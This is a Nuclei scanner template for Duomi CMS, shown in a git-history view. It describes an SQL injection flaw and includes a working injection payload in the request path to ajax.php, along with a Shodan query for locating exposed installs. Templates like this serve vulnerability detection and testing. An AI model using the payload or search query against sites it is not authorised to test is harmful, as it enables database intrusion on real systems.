nuclei-templates/vulnerabilities/other/duomicms-sql-injection.yaml

38 lines
999 B
YAML
Raw Normal View History

2021-02-26 15:44:31 +00:00
id: duomicms-sql-injection
info:
name: Duomi CMS - SQL Injection
2021-02-26 15:44:31 +00:00
author: pikpikcu
severity: critical
description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://redn3ck.github.io/2016/11/01/duomiCMS/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-06-28 12:59:31 +00:00
metadata:
2022-06-28 13:50:23 +00:00
verified: true
shodan-query: title:"DuomiCMS"
2021-02-26 15:44:31 +00:00
tags: duomicms,sqli
2022-06-30 02:54:58 +00:00
2022-06-30 02:48:22 +00:00
variables:
num: "999999999"
2021-02-26 15:44:31 +00:00
requests:
- method: GET
path:
2022-06-30 02:48:22 +00:00
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
2021-02-26 15:44:31 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-06-30 02:48:22 +00:00
- '{{md5({{num}})}}'
2021-02-26 15:44:31 +00:00
- type: status
status:
- 200
# Enhanced by md on 2022/09/28